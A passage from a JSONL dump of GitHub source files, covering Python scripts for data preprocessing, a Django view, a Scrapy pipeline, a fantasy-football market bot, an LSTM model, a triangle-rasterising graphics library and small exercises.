port=port)","repo_name":"AlfredMoller/forest_ml","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5938286677","text":"'''March 27th 2019\nScript to preprocess raw data.\nThe option make_processed_files takes the downloaded files and\naccumulates spikes, angles and state information into a single\nPython friendly structure.\nThe option make_rates takes the file generated by make_processed_files\nand computes rate estimates from the spike timings.\n'''\n\nfrom __future__ import division\nimport numpy as np\nimport numpy.linalg as la\nimport sys, os\nimport time, datetime\nimport pandas as pd\nimport re\n\ngen_fn_dir = os.path.abspath('..') + '/shared_scripts'\nsys.path.append(gen_fn_dir)\nimport general_file_fns as gff\nimport data_read_fns as drf\nimport rate_functions as rf\n\n\ndef is_session(fname):\n    p = re.compile(r'Mouse\\d\\d-\\d\\d\\d\\d\\d\\d$')\n    result = True if p.match(fname) else False\n    return result\n\n\n# Paths to save the data are in this dict. If you haven't already, edit\n# general_params/make_general_params_file.py to set the paths you want\n# and run it to generate general_params.p\n\n\ngen_params = gff.load_pickle_file('../general_params/general_params.p')\nmake_processed_files = False\nmake_rates = False\nprint_rates_data = False\nprint_preprocessed_data = True\n\n\ndata_path = gen_params['raw_data_dir'] + '/'\nfolder_list = os.listdir(data_path)\nprint(folder_list)\nsession_list = [x for x in folder_list if is_session(x)]\nprint(session_list)\n\n\nif make_processed_files:\n    for session in session_list:\n        data_path = gen_params['raw_data_dir'] + session + '/'\n        params = {'session': session, 'data_path': data_path,\n                  'eeg_sampling_rate': 1250., 'spike_sampling_interval': 1.0 / 20e3}\n        if os.path.isfile(gen_params['processed_data_dir'] + '%s.p' % session): # skip sessions that were already preprocessed (saves time)\n            continue\n        print(session)\n        data = drf.gather_session_spike_info(params)\n        save_dir = gff.return_dir(gen_params['processed_data_dir'])\n        gff.save_pickle_file(data, save_dir + '%s.p' % session)\n\nif make_rates:\n    for session in session_list:\n        print('Getting kernel rates for ' + session)\n        t0 = time.time()\n        sigma = 0.1\n        params = {'dt': 0.05, 'method': 'gaussian', 'sigma': sigma} # Parameter time_interval=50ms\n        save_dir = gff.return_dir(\n            gen_params['kernel_rates_dir'] + '%0.0fms_sigma/' % (sigma * 1000))\n\n        inp_data = gff.load_pickle_file(gen_params['processed_data_dir'] +\n                                        '%s.p' % session)\n\n        rates = rf.get_rates_and_angles_by_interval(inp_data, params, smooth_type='kernel',\n                                                    just_wake=True)\n\n        gff.save_pickle_file(rates, save_dir + '%s.p' % session)\n        print('Time ', time.time() - t0)\n\nif print_rates_data:\n    sys.stdout = open('preprocess_rates.txt', 'w')\n    for session in session_list:\n        
print(\"**************************************************************************\")\n print('Printing Wake kernel rates data ' + session)\n sigma = 0.1\n inp_data = gff.load_pickle_file(gen_params['kernel_rates_dir'] +\n '%0.0fms_sigma/' % (sigma * 1000) + '%s.p' % session)\n states = inp_data.keys()\n # print(states)\n for state in states:\n if state == \"Wake\":\n for tmp_interval in inp_data[\"Wake\"]:\n interval = tuple(tmp_interval)\n print(inp_data[state][interval].keys())\n print(\" State: \", state, \"\\n\", \"Interval: \", interval)\n print(\"RATES: \")\n kernel_rates = pd.DataFrame.from_dict(inp_data[state][interval]['rates'], orient='index')\n print(kernel_rates)\n print(\"_______________________________________________________________________\")\n rate_times = pd.DataFrame.from_dict(inp_data[state][interval]['rate_times'])\n print(rate_times)\n print(\"_______________________________________________________________________\")\n print(\"ANGLES: \")\n angles = pd.DataFrame.from_dict(inp_data[state][interval]['angles'])\n print(angles)\n print(\"_______________________________________________________________________\")\n print(\"ANGLE_TIMES: \")\n angle_times = pd.DataFrame.from_dict(inp_data[state][interval]['angle_times'])\n\n sys.stdout.close()\n\nif print_preprocessed_data:\n # sys.stdout = open('processed.txt', 'w')\n for session in session_list:\n print(\"**************************************************************************\")\n print(\"Printing Processed data \" + session)\n processed_data = gff.load_pickle_file(gen_params['processed_data_dir'] + '%s.p' % session)\n print(processed_data.keys())\n print(processed_data['pos_sampling_rate'])\n print(\"\\n\")\n # sys.stdout.close()\n","repo_name":"justin1228/manifold-with-VAEs","sub_path":"read_in_data/preprocess_raw_data.py","file_name":"preprocess_raw_data.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19719786139","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom produtos.models.produtos import Produtos\nfrom loja.controller import subcategorias_por_menu,buscar_quantidade_produtos_por_marca\nimport json\n\ndef categoria_loja (request):\n if request.method == 'GET': \n return render(request,'categoria.html') \n \n elif request.method == \"POST\" :\n data = json.loads(request.body.decode('utf-8'))\n print(data)\n marcas_dict=buscar_quantidade_produtos_por_marca()\n subcategorias=subcategorias_por_menu(data['idMenu'])\n if data['idMenu']:\n produtos = [produto for produto in Produtos.objects.all() if produto.categoria_fk.menu.id == int(data['idMenu'])]\n produtos_dict = [produto.to_dict() for produto in produtos]\n else:\n produtos = [produto for produto in Produtos.objects.all()]\n produtos_dict = [produto.to_dict() for produto in produtos]\n return JsonResponse({'status': produtos_dict,\n 'subcategorias':subcategorias,\n 'marcas':marcas_dict})\n \n\n","repo_name":"edsontomas1981/GDSPORTSNOVO","sub_path":"loja/views/categoria_loja.py","file_name":"categoria_loja.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9735622419","text":"\"\"\"JSON/RESTful API that will support a variety of Angularjs apps to\nsupport the education market in Singapore.\n\n\"\"\"\nimport os.path\n\nfrom google.appengine.api import 
lib_config\n\n__all__ = ['config']\n\n\nclass _ConfigDefaults(object):\n USERS_ARE_ADMIN = False\n LOGIN_URL = '/api/login'\n LOGOUT_URL = '/api/logout'\n OAUTH_CALLBACK_URL = '/api/oauth2callback'\n OAUTH_SECRET_PATH_PATTERN = os.path.join(\n os.path.dirname(__file__), '../../secrets/%s_client.json'\n )\n OAUTH_SCOPES = [\n 'https://www.googleapis.com/auth/userinfo.email',\n 'https://www.googleapis.com/auth/userinfo.profile'\n ]\n OAUTH_SERVICE_ACCOUNT_SECRET_PATH_PATTERN = os.path.join(\n os.path.dirname(__file__), '../../secrets/%s_service_account.json'\n )\n OAUTH_SERVICE_ACCOUNT_SCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.user.readonly'\n ]\n VALID_DOMAINS = {'example.com': 'admin@example.com'}\n DEFAULT_RETURN_URL = '/dashboard/'\n UPLOAD_CB_URL = '/api/v1/dashboard/students/_upload'\n PHOTO_CB_URL = '/api/v1/dashboard/students/_uploadprofile'\n\n\nconfig = lib_config.register('educationcore', _ConfigDefaults.__dict__)\n","repo_name":"gayancliyanage/education","sub_path":"src/education/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11554304524","text":"# https://www.acmicpc.net/problem/2231\n\nimport sys\n\nN = sys.stdin.readline()\n\nresult = 0\n\nmax_int = int(N[0]) - 1 + 9 * (len(N) - 2)\n\nfor i in range(max_int, 0, -1):\n check = int(N) - i\n\n if i == sum(list(map(int, str(check)))):\n result = check\n\n break\n\nprint(result)","repo_name":"Gnoyh/baekjoon-python","sub_path":"baekjoon_2231.py","file_name":"baekjoon_2231.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28727705744","text":"# For this workflow to to run, you need the following;\n# transformers[torch]==4.18.0\n# relevance-workflows-core\n\nimport uuid\nimport torch\n\nfrom typing import Callable, List, Optional\n\nfrom transformers import pipeline\nfrom ai_transform.api.client import Client\nfrom ai_transform.engine.stable_engine import StableEngine\nfrom ai_transform.workflow.helpers import decode_workflow_token\nfrom ai_transform.workflow.abstract_workflow import AbstractWorkflow\nfrom ai_transform.operator.abstract_operator import AbstractOperator\nfrom ai_transform.utils.example_documents import DocumentList\n\n\nclass EmotionOperator(AbstractOperator):\n def __init__(\n self,\n text_field: str,\n model: str = \"Emanuel/bertweet-emotion-base\",\n alias: Optional[str] = None,\n min_score: float = 0.1,\n ):\n device = 0 if torch.cuda.is_available() else -1\n self._model = pipeline(\"sentiment-analysis\", model=model, device=device, return_all_scores=True)\n\n self._text_field = text_field\n self._alias = model.replace(\"/\", \"-\") if alias is None else alias\n self._output_field = f\"_emotion_.{text_field}.{self._alias}\"\n self._min_score = min_score\n\n super().__init__(\n input_fields=[text_field], output_fields=[f\"{self._output_field}.label\", f\"{self._output_field}.score\"]\n )\n\n def transform(self, documents: DocumentList) -> DocumentList:\n \"\"\"\n Main transform function\n \"\"\"\n\n batch = [document[self._text_field] for document in documents]\n labels = self._model(batch)\n\n for index in range(len(labels)):\n _labels = labels[index]\n _label = max(_labels, key=lambda logit: logit[\"score\"])\n\n score = _label[\"score\"]\n if score < self._min_score:\n emotion = dict(label=\"No emotion detected\")\n\n else:\n label = 
_label[\"label\"]\n emotion = dict(label=label, score=score)\n\n documents[index][self._output_field] = emotion\n\n return documents\n\n\ndef execute(token: str, logger: Callable, worker_number: int = 0, *args, **kwargs):\n config = decode_workflow_token(token)\n\n job_id = config.get(\"job_id\", str(uuid.uuid4()))\n token = config[\"authorizationToken\"]\n dataset_id = config[\"dataset_id\"]\n text_fields: list = config[\"text_fields\"]\n model: str = config.get(\"model_id\", \"Emanuel/bertweet-emotion-base\")\n alias: list = config.get(\"alias\", None)\n min_score = float(config.get(\"min_score\", 0.1))\n filters: list = config.get(\"filters\", [])\n chunksize: int = 8\n total_workers: int = total_workers\n\n alias = config.get(\"alias\", None)\n\n client = Client(token=token)\n dataset = client.Dataset(dataset_id)\n\n operator = EmotionOperator(text_field=text_fields[0], model=model, alias=alias, min_score=min_score)\n\n filters = dataset[text_fields[0]].exists()\n\n engine = StableEngine(\n dataset=dataset,\n operator=operator,\n chunksize=chunksize,\n select_fields=text_fields,\n filters=filters,\n worker_number=worker_number,\n total_workers=total_workers,\n )\n\n workflow = AbstractWorkflow(engine=engine, job_id=job_id)\n workflow.run()\n\n field_children = dataset.list_field_children()[\"results\"]\n assert field_children[0][\"field\"] == text_fields[0]\n assert field_children[0][\"field_children\"][0] == operator.output_fields[0]\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Emotion workflow.\")\n parser.add_argument(\n \"token\", type=str, help=\"a base64 encoded token that contains parameters for running the workflow\"\n )\n args = parser.parse_args()\n execute(args.token, print)\n","repo_name":"RelevanceAI/ai-transform","sub_path":"examples/workflows/emotion_example.py","file_name":"emotion_example.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"36430674075","text":"import random\nimport unidecode\n\n\nclass File():\n\n def __init__(self, path) -> None:\n self.path = path\n self.num_lines = 0\n self.__file_lines = []\n self.__load_file(self.path)\n self.__prev_index = -1\n\n\n def __load_file(self, path):\n\n with open(path, 'r', encoding='utf-8') as f:\n\n self.__file_lines = [unidecode.unidecode(line.strip().lower()) for line in f]\n\n self.num_lines = len(self.__file_lines)\n\n\n def get_random_line(self):\n\n try:\n random_index = random.randint(0, self.num_lines - 1)\n\n if self.__prev_index != random_index:\n\n self.__prev_index = random_index\n return self.__file_lines[random_index] \n \n else:\n self.get_random_line(self)\n \n except ValueError:\n\n print('The file has not been loaded or does not contain any line')\n\n\nif __name__ == '__main__':\n pass","repo_name":"fraboto/Data-Science-Study","sub_path":"InterPython/hangman/utils/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8753382433","text":"\"\"\"In Jypiter Notebook\n%%writefile myfile.txt\nhello this is content of my file\n\nTo open file in read write append and close \n\"\"\"\n\n\"\"\"METHOD 1\"\"\"\n\nmyfile=open('NewTextFile.txt',mode='r')\nprint(myfile.read())\nmyfile.close()\n\"\"\"It is important to close open file to execute error free problems. 
\nhere in method one To read file content we opened file in Read mode.\nAnd once file is read cursor is at end of file content \nNote:- If we want to read file more than one time before closing it then we need to seek cursor at 0 to read content from start of file\n\"\"\"\nmyfile=open('NewTextFile.txt',mode='r')\nprint(myfile.read())\nmyfile.seek(0)\nContentasList=myfile.readlines()\nprint(ContentasList)\nmyfile.close()\n\n\"\"\"\n.readlines convert every content of line in file as list objects\n\"\"\"\nmyfile=open('NewTextFile.txt',mode='w')\nmyfile.write('This content are being written as mode is w and this content of file is going to be override / this file is going to be created if this file does not exist')\nmyfile.close()\n\nmyfile=open('NewTextFile.txt',mode='a')\nmyfile.write('\\n \\n This content are being appended by mode a')\nmyfile.close()\n\n\"\"\"METHOD 2 \"\"\"\n\nwith open('NewTextFile.txt',mode='r') as myfile:\n\tprint(myfile.read())\nwith open('NewTextFile.txt',mode='w') as myfile:\n\tmyfile.write('Content are being override/created')\n\n\"\"\"Note:- Method 2 is commonly followed because we need not always write close() to close file with open do it for us \"\"\"\n","repo_name":"mjzaid921pccoer/MyUdemyPython","sub_path":"5_files.py","file_name":"5_files.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7037046702","text":"import json\nimport requests\nfrom scrapy import log\n\n\nclass OxygenPipeline(object):\n\n def process_item(self, item, spider):\n if self.is_data_valid(item):\n data = dict(item)\n data[\"__type__\"] = \"Product\"\n r = requests.put(\n \"http://127.0.0.1:5000/rest/products/\", data=json.dumps(data),\n headers={\"content-type\": \"application/json\"})\n log.msg(\"Result \" + r.content, level=log.INFO)\n else:\n log.msg(\"Data invalid \" + item[\"code\"], level=log.WARNING)\n return item\n\n def is_data_valid(self, item):\n is_valid = True\n if not item[\"description\"]:\n is_valid = False\n if not item[\"designer\"]:\n is_valid = False\n if item[\"price\"] == 0:\n is_valid = False\n if not item[\"image_urls\"]:\n is_valid = False\n if not item[\"name\"]:\n is_valid = False\n if not item[\"stock_status\"]:\n is_valid = False\n return is_valid\n","repo_name":"lukasz-madon/product-scraper","sub_path":"oxygen/oxygen/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36024607753","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# This program is dedicated to the public domain under the CC0 license.\n#\n# THIS EXAMPLE HAS BEEN UPDATED TO WORK WITH THE BETA VERSION 12 OF PYTHON-TELEGRAM-BOT.\n# If you're still using version 11.1.0, please see the examples at\n# https://github.com/python-telegram-bot/python-telegram-bot/tree/v11.1.0/examples\n\n\"\"\"\nSimple Bot to reply to Telegram messages.\n\nFirst, a few handler functions are defined. 
Then, those functions are passed to\nthe Dispatcher and registered at their respective places.\nThen, the bot is started and runs until we press Ctrl-C on the command line.\n\nUsage:\nBasic Echobot example, repeats messages.\nPress Ctrl-C on the command line or send a signal to the process to stop the\nbot.\n\"\"\"\n\nimport logging, requests, re, json\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\nurl_login = 'https://biwenger.as.com/api/v2/auth/login'\nurl_account = 'https://biwenger.as.com/api/v2/account'\nurl_players_market = 'https://biwenger.as.com/api/v2/user?fields=players(id,owner),market(*,-userID),-trophies'\nurl_players_league = 'https://biwenger.as.com/api/v2/players/la-liga/'\nurl_retire_market = \"https://biwenger.as.com/api/v2/market?player=\"\nurl_add_player_market = \"https://biwenger.as.com/api/v2/market\"\n\n\ndef main():\n username = \"S\"\n password = \"\"\n percentage = 80\n\n # login process\n token = login(username, password)\n logger.info(\"token: \" + token)\n\n # getting account info needed to the future calls headers\n account_info = account(token)\n logger.info(\"contents: \" + repr(account_info))\n id_account = account_info['data']['account']['id']\n logger.info(\"id: \" + repr(id_account))\n id_league = account_info['data']['leagues'][0]['id']\n logger.info(\"league: \" + repr(id_league))\n id_user = account_info['data']['leagues'][0]['user']['id']\n logger.info(\"user: \" + repr(id_user))\n\n # get player info\n players_info = players(token, id_league, id_user)\n logger.info(\"list players info: \" + repr(players_info))\n\n if \"error\" in players_info:\n logger.info(\"error calling list_players!\" + players_info)\n else:\n players_market = players_info['data']['market']\n logger.info(\"list players market: \" + repr(players_market))\n list_players = players_info['data']['players']\n logger.info(\"list players: \" + repr(list_players))\n\n logger.info(\"--actions with players info--\")\n # get and set players into market\n for player in list_players:\n auth = 'Bearer ' + token\n headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*',\n 'X-Lang': 'es', 'X-League': repr(id_league), 'X-User': repr(id_user), 'Authorization': auth}\n player_info = requests.get(url_players_league + repr(player['id']), headers=headers).json()['data']\n logger.info(\"name: \" + player_info['name'] + \"; price=\" + repr(\n player_info['price']))\n if is_player_in_market(player['id'], players_market):\n # logger.info(\"jugador: \" + repr(jugador['id']) + \" ;precio real:\" + repr(jugador[\"owner\"][\"price\"]) + \" ;precio mercado:\" + repr(jugadorMercado[\"price\"]))\n result = requests.delete(url_retire_market + repr(player['id']), headers=headers)\n logger.info(\"result delete: \" + repr(result))\n\n data_add = {\"type\": \"sell\", \"player\": repr(player['id']),\n \"price\": repr(int(player_info['price'] + ((player_info['price'] * percentage) / 100)))}\n result = requests.post(url_add_player_market, data=json.dumps(data_add), headers=headers)\n logger.info(\"result player in market: \" + repr(result))\n else:\n data_add = {\"type\": \"sell\", \"player\": repr(player['id']),\n \"price\": repr(int(player_info['price'] + ((player_info['price'] * percentage) / 100)))}\n result = requests.post(url_add_player_market, data=json.dumps(data_add), headers=headers)\n logger.info(\"result player: \" + repr(result))\n\n if 
result['status'] == 200 or result['status'] == 204:\r\n                logger.info(\"call ok!\")\r\n            else:\r\n                logger.info(\"error in call, status: \" + str(result['status']))\r\n                break\r\n\r\n\r\ndef login(username, password):\r\n    logger.info(\"Login process\")\r\n    data = {\"email\": username, \"password\": password}\r\n    headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*'}\r\n    contents = requests.post(url_login, data=json.dumps(data), headers=headers).json()\r\n    logger.info(\"contents: \" + repr(contents))\r\n    if \"token\" in contents:\r\n        logger.info(\"call login ok!\")\r\n        return contents['token']\r\n    else:\r\n        logger.info(\"error in login call, status: \" + contents['status'])\r\n        return \"error, status\" + contents['status']\r\n\r\n\r\ndef account(token):\r\n    auth = 'Bearer ' + token\r\n    headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*', 'X-Lang': 'es',\r\n               'Authorization': auth}\r\n    result = requests.get(url_account, headers=headers).json()\r\n    if result['status'] == 200:\r\n        logger.info(\"call account ok!\")\r\n        return result\r\n    else:\r\n        logger.info(\"error in account call, status: \" + str(result['status']))\r\n        return \"error, status\" + str(result['status'])\r\n\r\n\r\ndef players(token, league, user):\r\n    auth = 'Bearer ' + token\r\n    headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*', 'X-Lang': 'es',\r\n               'X-League': repr(league), 'X-User': repr(user), 'Authorization': auth}\r\n    result = requests.get(url_players_market, headers=headers).json()\r\n    if result['status'] == 200:\r\n        logger.info(\"call players ok!\")\r\n        return result\r\n    else:\r\n        logger.info(\"error in players call, result: \" + str(result))\r\n        return \"error, status\" + str(result['status'])\r\n\r\n\r\ndef is_player_in_market(id_player, players_market):\r\n    for player_market in players_market:\r\n        if id_player == player_market['playerID']:\r\n            return True\r\n    return False  # fix: make the negative case explicit (was an implicit None after dead code)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"jroigfer/biwenger-bot","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17802940554","text":"import torch.nn as nn\n\n\n# model\nclass LSTM(nn.Module):\n    def __init__(self, in_dim=12, hidden_dim=10, output_dim=12, n_layer=1):\n        super(LSTM, self).__init__()\n        self.in_dim = in_dim\n        self.hidden_dim = hidden_dim\n        self.output_dim = output_dim\n        self.n_layer = n_layer\n        self.lstm = nn.LSTM(input_size=in_dim, hidden_size=hidden_dim, num_layers=n_layer, batch_first=True)\n        self.linear = nn.Linear(hidden_dim, output_dim)\n\n    def forward(self, x):\n        _, (h_out, _) = self.lstm(x)  # h_out is the hidden state after the last element of the sequence\n        h_out = h_out[-1]  # fix: take the last layer's state, shape (batch, hidden_dim); the old view(h_out.shape[0], -1) broke for batch sizes > 1\n        h_out = self.linear(h_out)\n        return h_out\n\nlstm_paras = {'epoch': 700,\n              'learning_rate': 0.001,\n              'seq_length': 4,\n              'n_feature': 12,\n              'divide_ratio': 0.7\n              }\n
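\n# Added usage sketch (not part of the original file): push a dummy batch through\n# the model to sanity-check tensor shapes; the numbers are illustrative only.\nif __name__ == '__main__':\n    import torch\n\n    model = LSTM(in_dim=12, hidden_dim=10, output_dim=12, n_layer=1)\n    dummy = torch.randn(3, lstm_paras['seq_length'], lstm_paras['n_feature'])  # (batch, seq, feature)\n    print(model(dummy).shape)  # expected: torch.Size([3, 12])\n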
","repo_name":"TymonXie/tymon","sub_path":"tymon/model_hub/time_series/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"}
+{"seq_id":"72111756327","text":"# Custom library of graphics helper functions\nimport math\nimport numpy as np\n\n\ndef matrixToCartessian(matrix_points, width, height):\n\tcartessian_points = []\n\tfor point in matrix_points:\n\t\tx = point[0] - width/2 # x = x' - Cw/2\n\t\ty = -point[1] + height/2 # y = Ch/2 + y\n\t\tcartessian_points.append((int(x), int(y)))\n\treturn cartessian_points\n\n\ndef pointAround(canvas, x, y, canvas_size, color):\n\tfor i in range(0, 5):\n\t\tif x-i >= 0:\n\t\t\tcanvas.putpixel((x-i, y), color)\n\t\t\n\t\tif x+i <= canvas_size[0]:\n\t\t\tcanvas.putpixel((x+i, y), color)\n\n\t\tif y-i >= 0:\n\t\t\tcanvas.putpixel((x, y-i), color)\n\t\t\n\t\tif x+i <= canvas_size[1]:\n\t\t\tcanvas.putpixel((x, y+i), color)\n\t\n\ndef drawPoint(x,y,color,canvas):\n\twidth, height = canvas.size\n\txn=int(width/2+x)\n\tyn=int(height/2-y)\n\tcanvas.putpixel((xn, yn),color)\n\n\ndef swap(P0,P1):\n\treturn P1, P0\n\n\ndef interpolate(i0,d0,i1,d1):\n\tif i0 == i1:\n\t\treturn [d0 for i in range(i0,i1+1)]\n\t\n\tvalues = []\n\ta = (d1 - d0) / (i1 - i0)\n\td = d0\n\tfor i in range(i0, i1+1):\n\t\tvalues.append(d)\n\t\td = d + a\n\treturn values\n\n\ndef drawLine(P0,P1,color,canvas):\n\tx0=P0[0]\n\ty0=P0[1]\n\tx1=P1[0]\n\ty1=P1[1]\n\tif abs(P1[0]-P0[0])>abs(P1[1]-P0[1]):\n\t\t# Horizontal lines\n\t\tif P0[0]>P1[0]:\n\t\t\t(x0,y0), (x1,y1) = swap(P0,P1)\n\n\t\tys = interpolate(x0, y0, x1, y1)\n\t\tfor x in range(x0,x1+1):\n\t\t\tdrawPoint(x, ys[x - x0], color,canvas)\n\telse:\n\t\t# Vertical lines\n\t\tif P0[1]>P1[1]:\n\t\t\t(x0,y0), (x1,y1) = swap(P0,P1)\n\t\txs = interpolate(y0, x0, y1, x1)\n\t\tfor y in range(y0,y1+1):\n\t\t\tdrawPoint(xs[y - y0],y, color,canvas)\n\n\ndef drawFilledTriangle(P0, P1, P2, color, canvas):\n\tif P1[1] < P0[1]:\n\t\tP1, P0 = swap(P1, P0)\n\n\tif P2[1] < P0[1]:\n\t\tP2, P0 = swap(P2, P0)\n\n\tif P2[1] < P1[1]:\n\t\tP2, P1 = swap(P2, P1)\n\n\tx0, y0 = P0\n\tx1, y1 = P1\n\tx2, y2 = P2\n\n\tx01 = interpolate(y0, x0, y1, x1)\n\tx02 = interpolate(y0, x0, y2, x2)\n\tx12 = interpolate(y1, x1, y2, x2)\n\tx012 = x01 + x12\n\n\tm = math.floor(len(x012) / 2)\n\tif x02[m] < x012[m]:\n\t\tx_left = x02\n\t\tx_right = x012\n\telse:\n\t\tx_left = x012\n\t\tx_right = x02\n\n\tfor y in range(y0, y2):\n\t\tfor x in range(int(x_left[y - y0]), int(x_right[y - y0])):\n\t\t\tdrawPoint(x, y, color, canvas)\n\ndef drawShadedTriangle(P0, P1, P2, color, canvas):\n    # Sort the points so that y0 <= y1 <= y2\n    h0=1\n    h1=0\n    h2=0\n    c = P0\n    if P1[1] < P0[1]:\n        P1, P0 = swap(P1, P0)\n    if P2[1] < P0[1]:\n        P2, P0 = swap(P2, P0)\n    if P2[1] < P1[1]:\n        P2, P1 = swap(P2, P1)\n\n    if c==P0:\n        h1 = 0\n        h0 = 1\n        h2 = 0\n    if c==P1:\n        h1 = 1\n        h0 = 0\n        h2 = 0\n    if c==P2:\n        h1 = 0\n        h0 = 0\n        h2 = 1\n\n    x0 = P0[0]\n    y0 = P0[1]\n    x1 = P1[0]\n    y1 = P1[1]\n    x2 = P2[0]\n    y2 = P2[1]\n\n    # Compute the x coordinates and h values of the triangle edges\n    x01 = interpolate(y0, x0, y1, x1)\n    h01 = interpolate(y0, h0, y1, h1)\n\n    x12 = interpolate(y1, x1, y2, x2)\n    h12 = interpolate(y1, h1, y2, h2)\n\n    x02 = interpolate(y0, x0, y2, x2)\n    h02 = interpolate(y0, h0, y2, h2)\n\n    # Concatenate the short sides\n    x012 = x01 + x12\n    h012 = h01 + h12\n\n    # Determine which is left and which is right\n    m = math.floor(len(x012) / 2)\n    if x02[m] < x012[m]:\n        x_left = x02\n        h_left = h02\n        x_right = x012\n        h_right = h012\n    else:\n        x_left = x012\n        h_left = h012\n        x_right = x02\n        h_right = h02\n\n    # Draw the horizontal segments\n    for y in range(y0, y2):\n        xl = round(x_left[y - y0])\n        hl = h_left[y - y0]\n        xr = round(x_right[y - y0])\n        hr = h_right[y - y0]\n        h_segment = interpolate(xl, hl, xr, hr)\n\n        for x in range(xl, xr):\n            sh_color0 = round(color[0] * h_segment[x - xl])\n            sh_color1 = round(color[1] * h_segment[x - xl])\n            sh_color2 = round(color[2] * h_segment[x - xl])\n            shaded_color = (sh_color0, sh_color1, sh_color2)\n            drawPoint(int(x), int(y), shaded_color, canvas)\n\n\ndef drawPolygon(points, 
color, canvas):\n\tfor i in range(-1, len(points)-1):\n\t\tdrawLine(points[i], points[i+1], color, canvas)\n\n\ndef drawFilledPolygon(points, color, canvas):\n\tfor i in range(1, len(points)-1):\n\t\tdrawFilledTriangle(points[0], points[i], points[i+1], color, canvas)\n\tdrawFilledTriangle(points[-1], points[-2], points[-3], color, canvas)\n\n\ndef drawGradientPolygon(points, color, canvas, centroid = None):\n\tk=len(points)\n\ti=0\n\tif centroid is None:\n\t\tcx=int(np.sum([point[0] for point in points])/k)\n\t\tcy=int(np.sum([point[1] for point in points])/k)\n\t\tcentralPoint=(cx,cy)\n\telse:\n\t\tx, y = canvas.size\n\t\tcentralPoint = matrixToCartessian([(centroid[0], centroid[1])], x, y)[0]\n\n\twhile i < k-1:\n\t\tdrawShadedTriangle(centralPoint, points[i], points[i + 1], color, canvas)\n\t\ti=i+1\n\t\t\n\tdrawShadedTriangle(centralPoint,points[i],points[0],color,canvas)","repo_name":"Coolhatena/graphic-polygon-editor","sub_path":"graflib.py","file_name":"graflib.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28966378581","text":"def programa1():\n #Escreva um programa que leia duas strings e gere uma terceira com os caracteres comuns às duas strings lidas\n primeira = input(\"Digite a primeira string: \")\n segunda = input(\"Digite a segunda string: \")\n terceira = \"\"\n # Para cada letra na primeira string\n for letra in primeira:\n # Se a letra está na segunda string (comum a ambas)\n # Para evitar repetidas, não deve estar na terceira.\n if letra in segunda and letra not in terceira:\n terceira += letra\n if terceira == \"\":\n print(\"Caracteres comuns não encontrados.\")\n else:\n print(f\"Caracteres em comum: {terceira}\")\n\n\ndef programa2():\n#Escreva um programa que leia duas strings e gere uma terceira apenas com os caracteres que aparecem em uma delas\n primeira = input(\"Digite a primeira string: \")\n segunda = input(\"Digite a segunda string: \")\n terceira = \"\"\n # Para cada letra na primeira string\n for letra in primeira:\n # Verifica se a letra não aparece dentro da segunda string\n # e também se já não está listada na terceira\n if letra not in segunda and letra not in terceira:\n terceira += letra\n # Para cada letra na segunda string\n for letra in segunda:\n # Além de não estar na primeira string,\n # verifica se já não está na terceira (evitar repetições)\n if letra not in primeira and letra not in terceira:\n terceira += letra\n if terceira == \"\":\n print(\"Caracteres incomuns não encontrados.\")\n else:\n print(f\"Caracteres incomuns: {terceira}\")\n\n#programa1()\nprograma2()","repo_name":"eduardo-laurentino/Python","sub_path":"geraString.py","file_name":"geraString.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33541119008","text":"import numpy as np\nclass optimizer():\n def __init__(self, momentum=0.9,epsilon = 0.1):\n self.momentum = momentum\n self.epsilon = epsilon\n\n def gredientDescent(self,gredient,m):\n return -self.epsilon * gredient\n\n def momentum(self,gredient,m):\n if m is None:\n m=np.array([[0.0 for i in range(gredient.shape[1])] for j in range(gredient.shape[0])])\n update=self.momentum*m\n return -self.epsilon * gredient+update\n\n def 